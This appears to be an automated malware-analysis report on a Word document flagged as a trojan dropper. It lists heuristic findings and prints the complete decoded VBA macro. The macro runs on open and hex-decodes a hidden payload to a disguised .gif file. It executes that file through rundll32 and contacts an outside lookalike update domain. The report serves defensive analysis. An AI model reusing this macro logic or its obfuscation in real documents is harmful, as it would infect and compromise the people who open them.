Office (OLE) malware analysis — malicious · 0f3085db3cac1716

MALICIOUS

Office (OLE)

998.5 KB Created: 2014-07-14 12:58:00 Authoring application: Microsoft Office Word First seen: 2020-12-25

MD5: 32261fe44c368724593fbf65d47fc826 SHA-1: 98d98abf2fb6b980884fd3333074d9d7088af0a3 SHA-256: 0f3085db3cac1716b8b61eec8e23d07d457a1937e37d5ef32fcf012b6c27fc7e

206 Risk Score

Heuristics 9

ClamAV: Doc.Trojan.Xshell-6923080-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Xshell-6923080-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
If (ok = True) Then Shell st, 0
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Sub Auto_Open()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
pth = Environ(s2)
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2838 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2838 bytes
SHA-256: `8c3c266c7e8d4c1283579911bfad2f88346e3031771e1496a2b9292b15a3798a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Sub Auto_Open() ShowPicture 1 End Sub Sub AutoOpen() ShowPicture 1 End Sub Private Sub ShowPicture(Void As Integer) Dim pik As Integer Dim pkm As String pkm = """" pik = 24 With ActiveDocument Dim aaa As String Dim aab As String With .Sections(pik) s1 = "5553455250524F46494C45" Dim s2 As String With .Range ind = 1 With .TextRetrievalMode While (ind < Len(s1)) Dim bt As String bt = Mid(s1, ind, 2) Dim tt As Integer On Error Resume Next ij = CLng("&H" & bt) s2 = s2 + Chr(ij) ind = ind + 2 Wend .IncludeHiddenText = True End With aaa = .Text pth = Environ(s2) s2 = "" s1 = "706F694C6F70" ind = 1 While (ind < Len(s1)) bt = Mid(s1, ind, 2) On Error Resume Next ij = CLng("&H" & bt) s2 = s2 + Chr(ij) ind = ind + 2 Wend Ft = s2 s2 = "" s1 = "5C70696333342E676966" ind = 1 While (ind < Len(s1)) bt = Mid(s1, ind, 2) On Error Resume Next ij = CLng("&H" & bt) s2 = s2 + Chr(ij) ind = ind + 2 Wend Nt = pth + s2 aab = Mid(aaa, 1, 6) Dim f As Integer f = FreeFile() Open Nt For Binary As f DoEvents If (Ft = aab) Then ok = True .Text = "" End If End With sel = Mid(aaa, 8, Len(aaa) - 8) If (ok = True) Then ind = 1 While (ind < Len(sel)) bt = Mid(sel, ind, 2) bt = "&H" + bt Dim a As Byte a = bt Put #f, , a ind = ind + 2 Wend ElseIf (InStr(1, sel, Ft) > 0 And Len(sel) > 0) Then ok = True End If End With Close f s2 = "" s1 = "72756E646C6C333220" End With ind = 1 While (ind < Len(s1)) bt = Mid(s1, ind, 2) On Error Resume Next ij = CLng("&H" & bt) s2 = s2 + Chr(ij) ind = ind + 2 Wend s3 = s2 s2 = "" s1 = "2C5F646563" ind = 1 While (ind < Len(s1)) bt = Mid(s1, ind, 2) On Error Resume Next ij = CLng("&H" & bt) s2 = s2 + Chr(ij) ind = ind + 2 Wend st = s3 + pkm + Nt + pkm + s2 If (ok = True) Then Shell st, 0 Dim ip As String With ActiveDocument s2 = "" s1 = "687474703A2F2F77696E646F77732E6D73776F726475706461746531372E636F6D2F73706C2F696D6167652F4F313032636C6B2E6A7067" ind = 1 While (ind < Len(s1)) bt = Mid(s1, ind, 2) On Error Resume Next ij = CLng("&H" & bt) s2 = s2 + Chr(ij) ind = ind + 2 Wend With .Shapes DoEvents .AddPicture FileName:=s2, _ LinkToFile:=True, _ SaveWithDocument:=False, _ Left:=-5, _ Top:=5, _ Anchor:=Selection.Range, _ Width:=3, _ Height:=3 If (.Count > 1) Then .Item(.Count).Delete End If End With .Save End With End Sub

SHA-256: 8c3c266c7e8d4c1283579911bfad2f88346e3031771e1496a2b9292b15a3798a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub Auto_Open()
    ShowPicture 1
End Sub
Sub AutoOpen()
    ShowPicture 1
End Sub































































Private Sub ShowPicture(Void As Integer)
Dim pik As Integer
Dim pkm As String
pkm = """"
pik = 24
With ActiveDocument
Dim aaa As String
Dim aab As String
With .Sections(pik)
s1 = "5553455250524F46494C45"
Dim s2 As String
With .Range
ind = 1
With .TextRetrievalMode
While (ind < Len(s1))
Dim bt As String
bt = Mid(s1, ind, 2)
Dim tt As Integer
On Error Resume Next
ij = CLng("&H" & bt)
s2 = s2 + Chr(ij)
ind = ind + 2
Wend
.IncludeHiddenText = True
End With
aaa = .Text
pth = Environ(s2)
s2 = ""
s1 = "706F694C6F70"
ind = 1
While (ind < Len(s1))
bt = Mid(s1, ind, 2)
On Error Resume Next
ij = CLng("&H" & bt)
s2 = s2 + Chr(ij)
ind = ind + 2
Wend
Ft = s2
s2 = ""
s1 = "5C70696333342E676966"
ind = 1
While (ind < Len(s1))
bt = Mid(s1, ind, 2)
On Error Resume Next
ij = CLng("&H" & bt)
s2 = s2 + Chr(ij)
ind = ind + 2
Wend
Nt = pth + s2
aab = Mid(aaa, 1, 6)
Dim f As Integer
f = FreeFile()
Open Nt For Binary As f
DoEvents
If (Ft = aab) Then
ok = True
.Text = ""
End If
End With
sel = Mid(aaa, 8, Len(aaa) - 8)
If (ok = True) Then
ind = 1
While (ind < Len(sel))
bt = Mid(sel, ind, 2)
bt = "&H" + bt
Dim a As Byte
a = bt
Put #f, , a
ind = ind + 2
Wend
ElseIf (InStr(1, sel, Ft) > 0 And Len(sel) > 0) Then
ok = True
End If
End With
Close f
s2 = ""
s1 = "72756E646C6C333220"
End With
ind = 1
While (ind < Len(s1))
bt = Mid(s1, ind, 2)
On Error Resume Next
ij = CLng("&H" & bt)
s2 = s2 + Chr(ij)
ind = ind + 2
Wend
s3 = s2
s2 = ""
s1 = "2C5F646563"
ind = 1
While (ind < Len(s1))
bt = Mid(s1, ind, 2)
On Error Resume Next
ij = CLng("&H" & bt)
s2 = s2 + Chr(ij)
ind = ind + 2
Wend
st = s3 + pkm + Nt + pkm + s2
If (ok = True) Then Shell st, 0
Dim ip As String
With ActiveDocument
s2 = ""
s1 = "687474703A2F2F77696E646F77732E6D73776F726475706461746531372E636F6D2F73706C2F696D6167652F4F313032636C6B2E6A7067"
ind = 1
While (ind < Len(s1))
bt = Mid(s1, ind, 2)
On Error Resume Next
ij = CLng("&H" & bt)
s2 = s2 + Chr(ij)
ind = ind + 2
Wend
With .Shapes
DoEvents
.AddPicture FileName:=s2, _
LinkToFile:=True, _
SaveWithDocument:=False, _
Left:=-5, _
Top:=5, _
Anchor:=Selection.Range, _
Width:=3, _
Height:=3
If (.Count > 1) Then
.Item(.Count).Delete
End If
End With
.Save
End With
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.